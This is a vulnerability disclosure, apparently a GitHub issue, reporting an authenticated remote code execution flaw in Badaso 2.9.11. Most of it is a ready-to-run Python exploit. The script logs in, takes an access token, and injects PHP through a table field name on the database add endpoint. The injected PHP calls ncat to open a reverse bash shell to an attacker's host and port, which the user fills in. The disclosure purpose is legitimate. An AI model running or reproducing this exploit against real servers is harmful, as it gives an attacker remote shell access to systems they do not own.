Authenticated RCE in Badaso

[0xdc9]

HI I have found an authenticated RCE in badaso, is there a way i can discuss/report this to you and get a CVE?

Thanks in advance

[0xdc9]

Since I get no email respond, therefore I decided to explain the vulnerability in this issues.

Bug Description
An authenticated user with permission to create a new table are able to add malicious PHP Code which then can led to OS code execution due to unsafe parsing at code BadasoDatabaseController.php at function add from line 65 - 77

To Reproduce/working exploit
To perform the reproduce, we have created the exploit attached below

import requests
import json
import random
import string

def gen_random_alpha(length: int = 6) -> str:
    alphabet = string.ascii_letters  # 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.choice(alphabet) for _ in range(length))


TARGET_HOST="" # change me (ex: http://localhost:8000)
TARGET_EMAIL_LOGIN = "" # change me (ex: admin@admin.com)
TARGET_PASSWORD_LOGIN = "" # change me (ex: badaso)
ATTACKER_NC_HOST="" #change me (ex: 103.122.188.110)
ATTACKER_NC_PORT="" # change me (ex: 8000)

# first phase: login and grab session
print("[-] Login and grab access token")
req = requests.session()
data = {"email":f"{TARGET_EMAIL_LOGIN}", "password":f"{TARGET_PASSWORD_LOGIN}", "remember":"false"}
out = req.post(str(TARGET_HOST+"/badaso-api/v1/auth/login"), json=data)
#print(out.text)
b = json.loads(out.text)
access_token = "Bearer "+ str(b['data']['accessToken'])
print("[+] Access Token Found: " + access_token)
print("[-] Exploiting (may take a while)")

# second phase: send and gain access
payload = f"evil');\n\tsystem(\"ncat -e /bin/bash {ATTACKER_NC_HOST} {ATTACKER_NC_PORT}\");\n\t//"
new_header = {"Content-Type":"application/json", "Authorization":f"{access_token}"}
tampered ="""{"table":"ayam_bakar_6","rows":[{"id":"id","fieldName":"id","fieldType":"bigint","fieldLength":null,"fieldNull":false,"fieldAttribute":true,"fieldIncrement":true,"fieldIndex":"primary","fieldDefault":null,"undeletable":true},{"id":"a350b57c-b349-48d9-a9bd-9293db3b2ec5","fieldName":"tests","fieldType":"integer","fieldLength":null,"fieldNull":false,"fieldAttribute":false,"fieldIncrement":false,"fieldIndex":null,"fieldDefault":""},{"fieldName":"created_at","fieldType":"timestamp","fieldLength":null,"fieldNull":true,"fieldAttribute":false,"fieldIncrement":false,"fieldIndex":null,"fieldDefault":null,"undeletable":true,"indexes":true},{"fieldName":"updated_at","fieldType":"timestamp","fieldLength":null,"fieldNull":true,"fieldAttribute":false,"fieldIncrement":false,"fieldIndex":null,"fieldDefault":null,"undeletable":true}],"relations":{}}"""
o = json.loads(tampered)
o['table'] = gen_random_alpha()
o['rows'][1]['id'] = gen_random_alpha()
o['rows'][1]['fieldName'] = payload

final_payload = json.dumps(o)
#print(final_payload)
#print(type(final_payload))

exp = req.post(str(TARGET_HOST+"/badaso-api/v1/database/add"), data=final_payload, headers=new_header)
#print(exp.text)

if '' in str(exp.text):
    print("[+] Exploit completed!")
else:
    print("[-] Exploit failed")

Screenshots

Versions Affected
Badaso 2.9.11